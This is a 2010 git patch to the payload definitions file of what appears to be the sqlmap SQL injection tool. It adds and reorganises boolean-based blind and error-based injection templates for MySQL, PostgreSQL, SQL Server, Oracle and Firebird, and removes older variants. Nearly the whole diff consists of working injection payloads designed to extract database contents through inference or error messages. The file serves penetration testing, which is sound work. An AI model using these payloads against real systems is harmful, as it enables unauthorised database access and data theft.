From 261261597822451894e213d20833b667c022b0a2 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Sat, 4 Dec 2010 16:40:08 +0000 Subject: [PATCH] Major improvements --- xml/payloads.xml | 411 +++++++++++++++++++++++++---------------------- 1 file changed, 217 insertions(+), 194 deletions(-) diff --git a/xml/payloads.xml b/xml/payloads.xml index 1f371bd1d..673936d8c 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -413,7 +413,7 @@ Formats: OR boolean-based blind - WHERE clause 1 - 4 + 3 3 1 2 @@ -428,7 +428,7 @@ Formats: OR boolean-based blind - WHERE clause 1 - 4 + 3 3 1 1 @@ -447,7 +447,7 @@ Formats: OR boolean-based blind - WHERE clause 1 - 4 + 3 3 1 1 @@ -462,11 +462,109 @@ Formats: + + + + + Generic boolean-based blind - Parameter replace + 1 + 2 + 1 + 2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END)) + + + + + MySQL >= 5.0 boolean-based blind - Parameter replace + 1 + 3 + 1 + 2,3 + 3 + (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + +
+ MySQL + >= 5.0 +
+ + + + MySQL < 5.0 boolean-based blind - Parameter replace + 1 + 4 + 1 + 2,3 + 3 + (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + +
+ MySQL +
+ + + + Microsoft SQL Server/Sybase boolean-based blind - Parameter replace + 1 + 3 + 1 + 3 + 3 + (SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + +
+ Microsoft SQL Server +
+ + + + Oracle boolean-based blind - Parameter replace + 1 + 3 + 1 + 3 + 3 + (SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) + +
+ Oracle +
+ + + + - Generic boolean-based blind - GROUP BY and ORDER BY clauses (append) + Generic boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 @@ -482,7 +580,7 @@ Formats: - MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append) + MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 @@ -502,7 +600,7 @@ Formats: - MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append) + MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses 1 4 1 @@ -521,7 +619,7 @@ Formats: - Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (append) + Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause 1 3 1 @@ -540,7 +638,7 @@ Formats: - Oracle boolean-based blind - ORDER BY clause (append) + Oracle boolean-based blind - ORDER BY clause 1 3 1 @@ -558,102 +656,6 @@ Formats: - - MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace) - 1 - 4 - 1 - 2,3 - 3 - (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) - -
- MySQL - >= 5.0 -
- - - - MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace) - 1 - 5 - 1 - 2,3 - 3 - (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - -
- MySQL -
- - - - Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (replace) - 1 - 4 - 1 - 3 - 3 - (SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - -
- Microsoft SQL Server -
- - - - Oracle boolean-based blind - ORDER BY clause (replace) - 1 - 4 - 1 - 3 - 3 - (SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) - -
- Oracle -
- - - - - - Generic boolean-based blind - GROUP BY and ORDER BY clauses (replace) - 1 - 4 - 1 - 2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END)) - - - - @@ -736,11 +738,11 @@ Formats: Firebird error-based - WHERE clause (AND) 2 - 1 + 2 0 1 1 - AND [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]') + AND [RANDNUM]=('[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]') AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') @@ -832,11 +834,11 @@ Formats: Firebird error-based - WHERE clause (OR) 2 - 2 + 3 2 1 1 - OR [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]') + OR [RANDNUM]=('[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]') OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') @@ -854,9 +856,108 @@ Formats: + + + MySQL >= 5.0 error-based - Parameter replace + 2 + 3 + 0 + 2,3 + 3 + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+ + + + PostgreSQL error-based - Parameter replace + 2 + 3 + 0 + 2,3 + 3 + (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) + + (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+ + + + Microsoft SQL Server/Sybase error-based - Parameter replace + 2 + 3 + 0 + 3 + 3 + (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) + + (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server +
+ + + + Oracle error-based - Parameter replace + 2 + 3 + 0 + 3 + 3 + (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+ + + + Firebird error-based - WHERE clause (OR) + 2 + 4 + 0 + 3 + 3 + (SELECT [RANDNUM]=('[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]')) + + (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+ + + + - MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses (append) + MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses 2 3 0 @@ -876,7 +977,7 @@ Formats: - PostgreSQL error-based - GROUP BY and ORDER BY clauses (append) + PostgreSQL error-based - GROUP BY and ORDER BY clauses 2 3 0 @@ -895,7 +996,7 @@ Formats: - Microsoft SQL Server/Sybase error-based - ORDER BY clause (append) + Microsoft SQL Server/Sybase error-based - ORDER BY clause 2 3 0 @@ -914,7 +1015,7 @@ Formats: - Oracle error-based - ORDER BY clause (append) + Oracle error-based - ORDER BY clause 2 3 0 @@ -931,83 +1032,6 @@ Formats: Oracle - - - MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses (replace) - 2 - 4 - 0 - 2,3 - 3 - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) - - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
- MySQL - >= 5.0 -
- - - - PostgreSQL error-based - GROUP BY and ORDER BY clauses (replace) - 2 - 4 - 0 - 2,3 - 3 - (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) - - (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
- PostgreSQL -
- - - - Microsoft SQL Server/Sybase error-based - ORDER BY clause (replace) - 2 - 4 - 0 - 3 - 3 - (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) - - (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
- Microsoft SQL Server -
- - - - Oracle error-based - ORDER BY clause (replace) - 2 - 4 - 0 - 3 - 3 - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
- Oracle -
- Firebird stacked queries 4 3